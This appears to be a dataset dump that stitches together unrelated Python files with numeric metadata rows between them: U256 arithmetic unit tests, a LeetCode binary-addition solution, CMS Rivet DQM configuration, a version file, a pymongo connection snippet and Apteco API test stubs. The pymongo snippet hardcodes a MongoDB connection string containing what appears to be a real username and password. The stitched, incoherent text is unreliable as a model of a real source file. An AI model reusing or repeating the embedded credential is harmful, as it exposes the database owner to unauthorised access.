value = U256(5)
value -= 4
assert isinstance(value, U256)
assert value == 1
def test_u256_isub_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value -= -4
def test_u256_isub_float() -> None:
value = U256(5)
value -= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 4.0
def test_u256_isub_underflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value -= 6
def test_u256_rmul() -> None:
value = 4 * U256(5)
assert isinstance(value, U256)
assert value == 20
def test_u256_rmul_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256 - 1) * U256(5)
def test_u256_rmul_negative() -> None:
with pytest.raises(ValueError):
(-4) * U256(5)
def test_u256_rmul_float() -> None:
value = (1.0) * U256(5)
assert not isinstance(value, int)
assert value == 5.0
def test_u256_mul() -> None:
value = U256(5) * 4
assert isinstance(value, U256)
assert value == 20
def test_u256_mul_overflow() -> None:
with pytest.raises(ValueError):
U256.MAX_VALUE * 4
def test_u256_mul_negative() -> None:
with pytest.raises(ValueError):
U256(5) * (-4)
def test_u256_mul_float() -> None:
value = U256(5) * (1.0)
assert not isinstance(value, int)
assert value == 5.0
def test_u256_wrapping_mul() -> None:
value = U256(5).wrapping_mul(4)
assert isinstance(value, U256)
assert value == 20
def test_u256_wrapping_mul_overflow() -> None:
value = U256.MAX_VALUE.wrapping_mul(4)
assert isinstance(value, U256)
assert (
value
== 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC
)
def test_u256_wrapping_mul_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_mul(-4)
def test_u256_imul() -> None:
value = U256(5)
value *= 4
assert isinstance(value, U256)
assert value == 20
def test_u256_imul_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= -4
def test_u256_imul_arg_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= 2 ** 256
def test_u256_imul_float() -> None:
value = U256(5)
value *= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 5.0
def test_u256_imul_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= 2 ** 256 - 1
def test_u256_floordiv() -> None:
value = U256(5) // 2
assert isinstance(value, U256)
assert value == 2
def test_u256_floordiv_overflow() -> None:
with pytest.raises(ValueError):
U256(5) // (2 ** 256)
def test_u256_floordiv_negative() -> None:
with pytest.raises(ValueError):
U256(5) // -2
def test_u256_floordiv_float() -> None:
value = U256(5) // 2.0
assert not isinstance(value, U256)
assert value == 2
def test_u256_rfloordiv() -> None:
value = 5 // U256(2)
assert isinstance(value, U256)
assert value == 2
def test_u256_rfloordiv_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256) // U256(2)
def test_u256_rfloordiv_negative() -> None:
with pytest.raises(ValueError):
(-2) // U256(5)
def test_u256_rfloordiv_float() -> None:
value = 5.0 // U256(2)
assert not isinstance(value, U256)
assert value == 2
def test_u256_ifloordiv() -> None:
value = U256(5)
value //= 2
assert isinstance(value, U256)
assert value == 2
def test_u256_ifloordiv_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value //= -2
def test_u256_ifloordiv_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value //= 2 ** 256
def test_u256_rmod() -> None:
value = 6 % U256(5)
assert isinstance(value, U256)
assert value == 1
def test_u256_rmod_float() -> None:
value = (6.0) % U256(5)
assert not isinstance(value, int)
assert value == 1.0
def test_u256_mod() -> None:
value = U256(5) % 4
assert isinstance(value, U256)
assert value == 1
def test_u256_mod_overflow() -> None:
with pytest.raises(ValueError):
U256(5) % (2 ** 256)
def test_u256_mod_negative() -> None:
with pytest.raises(ValueError):
U256(5) % (-4)
def test_u256_mod_float() -> None:
value = U256(5) % (1.0)
assert not isinstance(value, int)
assert value == 0.0
def test_u256_imod() -> None:
value = U256(5)
value %= 4
assert isinstance(value, U256)
assert value == 1
def test_u256_imod_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value %= 2 ** 256
def test_u256_imod_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value %= -4
def test_u256_imod_float() -> None:
value = U256(5)
value %= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 0.0
def test_u256_divmod() -> None:
quotient, remainder = divmod(U256(5), 2)
assert isinstance(quotient, U256)
assert isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_divmod_overflow() -> None:
with pytest.raises(ValueError):
divmod(U256(5), 2 ** 256)
def test_u256_divmod_negative() -> None:
with pytest.raises(ValueError):
divmod(U256(5), -2)
def test_u256_divmod_float() -> None:
quotient, remainder = divmod(U256(5), 2.0)
assert not isinstance(quotient, U256)
assert not isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_rdivmod() -> None:
quotient, remainder = divmod(5, U256(2))
assert isinstance(quotient, U256)
assert isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_rdivmod_overflow() -> None:
with pytest.raises(ValueError):
divmod(2 ** 256, U256(2))
def test_u256_rdivmod_negative() -> None:
with pytest.raises(ValueError):
divmod(-5, U256(2))
def test_u256_rdivmod_float() -> None:
quotient, remainder = divmod(5.0, U256(2))
assert not isinstance(quotient, U256)
assert not isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_pow() -> None:
value = U256(3) ** 2
assert isinstance(value, U256)
assert value == 9
def test_u256_pow_overflow() -> None:
with pytest.raises(ValueError):
U256(340282366920938463463374607431768211456) ** 3
def test_u256_pow_negative() -> None:
with pytest.raises(ValueError):
U256(3) ** -2
def test_u256_pow_modulo() -> None:
value = pow(U256(4), 2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_pow_modulo_overflow() -> None:
with pytest.raises(ValueError):
pow(U256(4), 2, 2 ** 257)
def test_u256_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
pow(U256(4), 2, -3)
def test_u256_rpow() -> None:
value = 3 ** U256(2)
assert isinstance(value, U256)
assert value == 9
def test_u256_rpow_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256) ** U256(2)
def test_u256_rpow_negative() -> None:
with pytest.raises(ValueError):
(-3) ** U256(2)
def test_u256_rpow_modulo() -> None:
value = U256.__rpow__(U256(2), 4, 3)
assert isinstance(value, int)
assert value == 1
def test_u256_rpow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256.__rpow__(U256(2), 4, 2 ** 256 + 1)
def test_u256_rpow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256.__rpow__(U256(2), 4, -3)
def test_u256_ipow() -> None:
value = U256(3)
value **= 2
assert isinstance(value, U256)
assert value == 9
def test_u256_ipow_overflow() -> None:
value = U256(340282366920938463463374607431768211456)
with pytest.raises(ValueError):
value **= 3
def test_u256_ipow_negative() -> None:
value = U256(3)
with pytest.raises(ValueError):
value **= -2
def test_u256_ipow_modulo() -> None:
value = U256(4).__ipow__(2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_ipow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256(4).__ipow__(2, -3)
def test_u256_ipow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256(4).__ipow__(2, 2 ** 256 + 1)
def test_u256_wrapping_pow() -> None:
value = U256(3).wrapping_pow(2)
assert isinstance(value, U256)
assert value == 9
def test_u256_wrapping_pow_overflow() -> None:
value = U256(340282366920938463463374607431768211455).wrapping_pow(3)
assert isinstance(value, U256)
assert value == 0x2FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
def test_u256_wrapping_pow_negative() -> None:
with pytest.raises(ValueError):
U256(3).wrapping_pow(-2)
def test_u256_wrapping_pow_modulo() -> None:
value = U256(4).wrapping_pow(2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_wrapping_pow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256(4).wrapping_pow(2, 2 ** 256 + 1)
def test_u256_wrapping_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256(4).wrapping_pow(2, -3)
def test_u256_to_be_bytes_zero() -> None:
encoded = U256(0).to_be_bytes()
assert encoded == bytes([])
def test_u256_to_be_bytes_one() -> None:
encoded = U256(1).to_be_bytes()
assert encoded == bytes([1])
def test_u256_to_be_bytes_is_big_endian() -> None:
encoded = U256(0xABCD).to_be_bytes()
assert encoded == bytes([0xAB, 0xCD])
def test_u256_to_be_bytes32_zero() -> None:
encoded = U256(0).to_be_bytes32()
assert encoded == bytes([0] * 32)
def test_u256_to_be_bytes32_one() -> None:
encoded = U256(1).to_be_bytes32()
assert encoded == bytes([0] * 31 + [1])
def test_u256_to_be_bytes32_max_value() -> None:
encoded = U256(2 ** 256 - 1).to_be_bytes32()
assert encoded == bytes(
[
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
]
)
def test_u256_from_be_bytes_empty() -> None:
value = U256.from_be_bytes(b"")
assert value == 0
def test_u256_from_be_bytes_one() -> None:
value = U256.from_be_bytes(bytes([1]))
assert value == 1
def test_u256_from_be_bytes_is_big_endian() -> None:
value = U256.from_be_bytes(bytes([0xAB, 0xCD]))
assert value == 0xABCD
def test_u256_from_be_bytes_too_large() -> None:
with pytest.raises(ValueError):
U256.from_be_bytes(bytes([0xFF] * 33))
def test_u256_bitwise_and_successful() -> None:
assert U256(0) & U256(0) == 0
assert U256(2 ** 256 - 1) & U256(2 ** 256 - 1) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) & U256(0) == U256(0)
def test_u256_bitwise_and_fails() -> None:
with pytest.raises(ValueError):
U256(0) & (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) & (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) & -10
def test_u256_bitwise_or_successful() -> None:
assert U256(0) | U256(0) == 0
assert U256(2 ** 256 - 1) | U256(0) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) | U256(2 ** 256 - 1) == U256(2 ** 256 - 1)
assert U256(2 ** 256 - 1) | U256(17) == U256(2 ** 256 - 1)
assert U256(17) | U256(18) == U256(19)
def test_u256_bitwise_or_failed() -> None:
with pytest.raises(ValueError):
U256(0) | (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) | (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) | -10
def test_u256_bitwise_xor_successful() -> None:
assert U256(0) ^ U256(0) == 0
assert U256(2 ** 256 - 1) ^ U256(0) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) ^ U256(2 ** 256 - 1) == U256(0)
assert U256(2 ** 256 - 1) ^ U256(17) == U256(2 ** 256 - 1) - U256(17)
assert U256(17) ^ U256(18) == U256(3)
def test_u256_bitwise_xor_failed() -> None:
with pytest.raises(ValueError):
U256(0) | (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) ^ (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) ^ -10
def test_u256_bitwise_rxor_successful() -> None:
assert U256(0).__rxor__(U256(0)) == 0
assert U256(2 ** 256 - 1).__rxor__(U256(0)) == 2 ** 256 - 1
assert U256(2 ** 256 - 1).__rxor__(U256(2 ** 256 - 1)) == U256(0)
assert U256(2 ** 256 - 1).__rxor__(U256(17)) == U256(2 ** 256 - 1) - U256(
17
)
assert U256(17).__rxor__(U256(18)) == U256(3)
def test_u256_bitwise_rxor_failed() -> None:
with pytest.raises(ValueError):
U256(0).__rxor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__rxor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__rxor__(-10)
def test_u256_bitwise_ixor_successful() -> None:
assert U256(0).__ixor__(U256(0)) == 0
assert U256(2 ** 256 - 1).__ixor__(U256(0)) == 2 ** 256 - 1
assert U256(2 ** 256 - 1).__ixor__(U256(2 ** 256 - 1)) == U256(0)
assert U256(2 ** 256 - 1).__ixor__(U256(17)) == U256(2 ** 256 - 1) - U256(
17
)
assert U256(17).__ixor__(U256(18)) == U256(3)
def test_u256_bitwise_ixor_failed() -> None:
with pytest.raises(ValueError):
U256(0).__ixor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__ixor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__ixor__(-10)
def test_u256_invert() -> None:
assert ~U256(0) == U256_MAX_VALUE
assert ~U256(10) == U256_MAX_VALUE - 10
assert ~U256(2 ** 256 - 1) == 0
def test_u256_rshift() -> None:
assert U256(U256_MAX_VALUE) >> 255 == 1
assert U256(U256_MAX_VALUE) >> 256 == 0
assert U256(U256_MAX_VALUE) >> 257 == 0
assert U256(0) >> 20 == 0
| 22.133594 | 78 | 0.613709 | 3,868 | 28,331 | 4.282058 | 0.027404 | 0.085794 | 0.08368 | 0.150697 | 0.934734 | 0.866812 | 0.810964 | 0.755539 | 0.680432 | 0.603936 | 0 | 0.109508 | 0.253821 | 28,331 | 1,279 | 79 | 22.150899 | 0.673983 | 0.004553 | 0 | 0.520642 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014792 | 0 | 0.28211 | 1 | 0.232798 | false | 0 | 0.002294 | 0 | 0.235092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ac6c75106f0615fd7e07011035c5c3930991dfeb | 150 | py | Python | Dataset/Leetcode/test/67/588.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/67/588.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/67/588.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def XXX(self, a: str, b: str) -> str:
#return bin(int(a,2)+int(b,2))[2:]
return '{:b}'.format(int(a,2)+int(b,2))
| 25 | 47 | 0.513333 | 28 | 150 | 2.75 | 0.464286 | 0.103896 | 0.12987 | 0.207792 | 0.25974 | 0.25974 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.233333 | 150 | 5 | 48 | 30 | 0.626087 | 0.22 | 0 | 0 | 0 | 0 | 0.034783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ac6edbc3cd2c6c1a9c6edc8bdeb36b6e5982232b | 13,633 | py | Python | GeneratorInterface/RivetInterface/python/PostProcessor_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | GeneratorInterface/RivetInterface/python/PostProcessor_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | GeneratorInterface/RivetInterface/python/PostProcessor_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
###################
#CMS_2011_S8968497
###################
postCMS_2011_S8968497 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8968497"),
efficiency = cms.vstring(""),
resolution = cms.vstring(""),
normalizationToIntegral = cms.untracked.vstring("d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01",
"d04-x01-y01",
"d05-x01-y01",
"d06-x01-y01",
"d07-x01-y01",
"d08-x01-y01",
"d09-x01-y01")
)
###################
#CMS_2010_S8547297
###################
postCMS_2010_S8547297= cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2010_S8547297"),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 2.5",
"d01-x01-y02 2.5",
"d01-x01-y03 2.5",
"d01-x01-y04 2.5",
"d02-x01-y01 2.5",
"d02-x01-y02 2.5",
"d02-x01-y03 2.5",
"d02-x01-y04 2.5",
"d03-x01-y01 2.5",
"d03-x01-y02 2.5",
"d03-x01-y03 2.5",
"d03-x01-y04 2.5",
"d04-x01-y01 2.5",
"d04-x01-y02 2.5",
"d04-x01-y03 2.5",
"d04-x01-y04 2.5",
"d05-x01-y01 2.5",
"d05-x01-y02 2.5",
"d05-x01-y03 2.5",
"d05-x01-y04 2.5",
"d06-x01-y01 2.5",
"d06-x01-y02 2.5",
"d06-x01-y03 2.5",
"d06-x01-y04 2.5",
"d07-x01-y01 0.0331572798065",
"d07-x01-y02 0.0331572798065"
),
normalizationToIntegral = cms.untracked.vstring(
"d01-x01-y01 nEvt",
"d01-x01-y02 nEvt",
"d01-x01-y03 nEvt",
"d01-x01-y04 nEvt",
"d02-x01-y01 nEvt",
"d02-x01-y02 nEvt",
"d02-x01-y03 nEvt",
"d02-x01-y04 nEvt",
"d03-x01-y01 nEvt",
"d03-x01-y02 nEvt",
"d03-x01-y03 nEvt",
"d03-x01-y04 nEvt",
"d04-x01-y01 nEvt",
"d04-x01-y02 nEvt",
"d04-x01-y03 nEvt",
"d04-x01-y04 nEvt",
"d05-x01-y01 nEvt",
"d05-x01-y02 nEvt",
"d05-x01-y03 nEvt",
"d05-x01-y04 nEvt",
"d06-x01-y01 nEvt",
"d06-x01-y02 nEvt",
"d06-x01-y03 nEvt",
"d06-x01-y04 nEvt",
"d07-x01-y01 nEvt",
"d07-x01-y02 nEvt",
"d08-x01-y01 nEvt",
"d08-x01-y02 nEvt"
)
)
###################
#CMS_2010_S8656010
###################
postCMS_2010_S8656010= cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2010_S8656010"),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 2.5",
"d01-x01-y02 2.5",
"d01-x01-y03 2.5",
"d01-x01-y04 2.5",
"d02-x01-y01 2.5",
"d02-x01-y02 2.5",
"d02-x01-y03 2.5",
"d02-x01-y04 2.5",
"d03-x01-y01 2.5",
"d03-x01-y02 2.5",
"d03-x01-y03 2.5",
"d03-x01-y04 2.5",
"d04-x01-y01 2.5",
"d04-x01-y02 2.5",
"d04-x01-y03 2.5",
"d04-x01-y04 2.5",
"d05-x01-y01 2.5",
"d05-x01-y02 2.5",
"d05-x01-y03 2.5",
"d05-x01-y04 2.5",
"d06-x01-y01 2.5",
"d06-x01-y02 2.5",
"d06-x01-y03 2.5",
"d06-x01-y04 2.5",
"d07-x01-y01 0.0331572798065",
"d07-x01-y02 0.0331572798065"
),
normalizationToIntegral = cms.untracked.vstring(
"d01-x01-y01 nEvt",
"d01-x01-y02 nEvt",
"d01-x01-y03 nEvt",
"d01-x01-y04 nEvt",
"d02-x01-y01 nEvt",
"d02-x01-y02 nEvt",
"d02-x01-y03 nEvt",
"d02-x01-y04 nEvt",
"d03-x01-y01 nEvt",
"d03-x01-y02 nEvt",
"d03-x01-y03 nEvt",
"d03-x01-y04 nEvt",
"d04-x01-y01 nEvt",
"d04-x01-y02 nEvt",
"d04-x01-y03 nEvt",
"d04-x01-y04 nEvt",
"d05-x01-y01 nEvt",
"d05-x01-y02 nEvt",
"d05-x01-y03 nEvt",
"d05-x01-y04 nEvt",
"d06-x01-y01 nEvt",
"d06-x01-y02 nEvt",
"d06-x01-y03 nEvt",
"d06-x01-y04 nEvt",
"d07-x01-y01 nEvt",
"d07-x01-y02 nEvt",
"d08-x01-y01 nEvt",
"d08-x01-y02 nEvt"
)
)
###################
#CMS_2011_S8884919
###################
postCMS_2011_S8884919 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8884919"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01",
"d04-x01-y01",
"d05-x01-y01",
"d06-x01-y01",
"d07-x01-y01",
"d08-x01-y01",
"d09-x01-y01",
"d10-x01-y01",
"d11-x01-y01",
"d12-x01-y01",
"d13-x01-y01",
"d14-x01-y01",
"d15-x01-y01",
"d16-x01-y01",
"d17-x01-y01",
"d17-x01-y02",
"d18-x01-y01",
"d18-x01-y02",
"d19-x01-y01",
"d19-x01-y02",
"d20-x01-y01",
"d21-x01-y01",
"d22-x01-y01",
"d23-x01-y01",
"d24-x01-y01",
"d25-x01-y01"
)
)
###################
#CMS_2011_S8941262
###################
postCMS_2011_S8941262 = cms.EDAnalyzer("DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8941262"),
xsection = cms.untracked.double(1000),
normalizeToLumi = cms.untracked.vstring(
"d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01"
),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 0.000001", #norm from picobarn to microbarn
"d02-x01-y01 0.001", #norm from picobarn to nanobarn
"d03-x01-y01 0.001" #norm from picobarn to nanobarn
)
)
###################
#CMS_2011_S8950903
###################
postCMS_2011_S8950903 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8950903"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01"
)
)
###################
#CMS_2011_S8957746
###################
postCMS_2011_S8957746 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8957746"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01",
"d01-x02-y01",
"d01-x03-y01",
"d02-x01-y01",
"d02-x02-y01",
"d02-x03-y01"
)
)
###################
#CMS_2011_S8968497
###################
postCMS_2011_S8968497 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8968497"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01"
)
)
###################
#CMS_2011_S9086218
###################
postCMS_2011_S9086218 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S9086218"),
xsection = cms.untracked.double(1000),
normalizeToLumi = cms.untracked.vstring(
"d01-x01-y01 nEvt"
),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 0.5"
)
)
###################
#CMS_2011_S9088458
###################
postCMSo2011oS9088458 = DQMEDHarvester(
"DQMGenericClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S9088458"),
efficiencyProfile = cms.untracked.vstring("d01-x01-y01 d01-x01-y01 trijet dijet"),
resolution = cms.vstring(""),
efficiency = cms.vstring("")
)
####SEQUENCES
RivetDQMPostProcessor = cms.Sequence( postCMS_2011_S8968497 +
postCMS_2010_S8547297 +
postCMS_2010_S8656010 +
postCMS_2011_S8884919 +
postCMS_2011_S8941262 +
postCMS_2011_S8950903 +
postCMS_2011_S8957746 +
postCMS_2011_S8968497 +
postCMS_2011_S9086218 +
postCMSo2011oS9088458 )
| 43.006309 | 98 | 0.29722 | 964 | 13,633 | 4.124481 | 0.092324 | 0.117706 | 0.114688 | 0.077465 | 0.739437 | 0.739437 | 0.739437 | 0.697938 | 0.679829 | 0.634557 | 0 | 0.285178 | 0.589745 | 13,633 | 316 | 99 | 43.142405 | 0.425711 | 0.020025 | 0 | 0.662551 | 0 | 0 | 0.211773 | 0.017744 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00823 | 0 | 0.00823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3ba750f7a40fbb16c701a2abec0c59c8dc28c95f | 19 | py | Python | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 35 | 2016-09-15T18:43:18.000Z | 2021-11-12T23:15:54.000Z | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 33 | 2016-11-11T22:01:21.000Z | 2020-07-05T07:11:35.000Z | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 16 | 2017-01-17T03:27:58.000Z | 2021-11-12T23:15:58.000Z | __version__=0.9.14
| 9.5 | 18 | 0.789474 | 4 | 19 | 2.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0.052632 | 19 | 1 | 19 | 19 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3bdaa9bbc7fd681ccfc56c1b76dffced3d2ff4c0 | 186 | py | Python | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | import pymongo
client = pymongo.MongoClient("mongodb+srv://remember_auth:hRmXnjYiziGTz3DP@cluster0-d2d9w.azure.mongodb.net/test?retryWrites=true&w=majority")
db = client["remember-dev"] | 46.5 | 142 | 0.811828 | 24 | 186 | 6.25 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 0.043011 | 186 | 4 | 143 | 46.5 | 0.820225 | 0 | 0 | 0 | 0 | 0.333333 | 0.652406 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ce19c99d5519a63c713bb773883abbed76bdf197 | 9,111 | py | Python | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | 2 | 2020-05-21T14:24:16.000Z | 2020-12-03T19:56:34.000Z | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Apteco API
An API to allow access to Apteco Marketing Suite resources # noqa: E501
The version of the OpenAPI document: v2
Contact: support@apteco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import apteco_api
from apteco_api.api.audiences_api import AudiencesApi # noqa: E501
from apteco_api.rest import ApiException
class TestAudiencesApi(unittest.TestCase):
"""AudiencesApi unit test stubs"""
def setUp(self):
self.api = apteco_api.api.audiences_api.AudiencesApi() # noqa: E501
def tearDown(self):
pass
def test_audiences_calculate_audience_data_licensing_sync(self):
"""Test case for audiences_calculate_audience_data_licensing_sync
Get data licensing information for the latest version of this audience # noqa: E501
"""
pass
def test_audiences_calculate_audience_latest_update_sync(self):
"""Test case for audiences_calculate_audience_latest_update_sync
Calculate counts against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to produce the end result # noqa: E501
"""
pass
def test_audiences_cancel_calculate_audience_data_licensing_job(self):
"""Test case for audiences_cancel_calculate_audience_data_licensing_job
Cancel a running data licensing job # noqa: E501
"""
pass
def test_audiences_cancel_calculate_audience_job(self):
"""Test case for audiences_cancel_calculate_audience_job
Cancel a running calculate job # noqa: E501
"""
pass
def test_audiences_cancel_check_audience_job(self):
"""Test case for audiences_cancel_check_audience_job
Cancel a running check job # noqa: E501
"""
pass
def test_audiences_cancel_export_audience_job(self):
"""Test case for audiences_cancel_export_audience_job
Cancel a running export job # noqa: E501
"""
pass
def test_audiences_check_audience_latest_update_sync(self):
"""Test case for audiences_check_audience_latest_update_sync
Calculate check statistics against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to analyse and the specified dimensions will be used to perform the analysis. # noqa: E501
"""
pass
